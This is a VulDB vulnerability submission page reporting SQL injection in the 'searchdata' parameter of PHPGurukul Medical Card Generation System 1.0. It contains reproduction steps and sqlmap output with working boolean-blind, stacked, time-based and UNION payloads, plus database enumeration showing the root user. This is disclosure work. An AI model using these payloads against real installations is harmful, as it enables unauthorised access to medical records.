Invia #427405: PHPGurukul Medical Card Generation System - searchdata Parameter V1.0 SQL Injectioninformazioni

TitoloPHPGurukul Medical Card Generation System - searchdata Parameter V1.0 SQL Injection
DescrizioneI would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing. Details: Affected URL/Endpoint: /mcgs/admin/search-medicalcard.php Vulnerable Parameter: 'searchdata' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Sign in as admin. 2) Navigate to Search and input a reference number for example: '687246123' 3) Use a proxy like burpsuite to intercept the request. 4) Input the payload to invoke the SQL injection. sqlmap resumed the following injection point(s) from stored session: --- Parameter: searchdata (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: searchdata=687246123' AND 7281=7281-- WNmw&search= Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: searchdata=687246123';SELECT SLEEP(5)#&search= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=687246123' AND (SELECT 8201 FROM (SELECT(SLEEP(5)))cTpy)-- Ffmf&search= Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: searchdata=687246123' UNION ALL SELECT NULL,CONCAT(0x716b6b7071,0x587271596244774d534461554d45544e726c586d4c50674e744779635a6f706c6f7a5a4f6e6d4b6f,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search= --- [11:04:04] [INFO] the back-end DBMS is MySQL [11:04:04] [INFO] fetching banner web application technology: PHP 8.2.18, Apache 2.4.59 back-end DBMS: MySQL >= 5.0.12 banner: '8.3.0' [11:04:04] [INFO] fetching current user current user: 'root@localhost' [11:04:04] [INFO] fetching current database current database: 'mgsdb' Please let me know if you need further information or a more detailed analysis.
Utente
 Delvy (UID 74555)
Sottomissione21/10/2024 05:06 (2 anni fa)
Moderazione23/10/2024 13:05 (2 days later)
StatoAccettato
Voce VulDB281568 [PHPGurukul Medical Card Generation System 1.0 Search search-medicalcard.php searchdata iniezione SQL]
Punti17

PrecedenteVisione D'ensembleIl prossimo

Do you know our Splunk app?

Download it now for free!